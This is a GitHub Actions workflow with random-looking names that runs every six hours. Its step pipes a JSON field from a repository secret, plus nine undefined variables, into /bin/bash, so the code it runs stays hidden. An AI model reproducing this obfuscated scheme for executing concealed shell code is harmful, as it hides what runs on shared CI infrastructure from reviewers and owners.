name: zhaoshouyy
on:
  workflow_dispatch:
  schedule:
    - cron: '18 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaoshouyy
        env:
          vh180: ${{ secrets.vh180 }}
        run: |
          echo $vh180 | jq -r .bnnx88002 | /bin/bash
          echo $fvm52756 | jq -r .rasc40 | /bin/bash
          echo $samx44 | jq -r .ofv71 | /bin/bash
          echo $gptt69 | jq -r .zbt709 | /bin/bash
          echo $jt16544 | jq -r .srus5262 | /bin/bash
          echo $v0 | jq -r .mkjli852 | /bin/bash
          echo $bbbsl6357 | jq -r .tafp89 | /bin/bash
          echo $ssscc9 | jq -r .kfcy3 | /bin/bash
          echo $dotk50 | jq -r .wwbe866 | /bin/bash
          echo $wk11908 | jq -r .wg55012 | /bin/bash

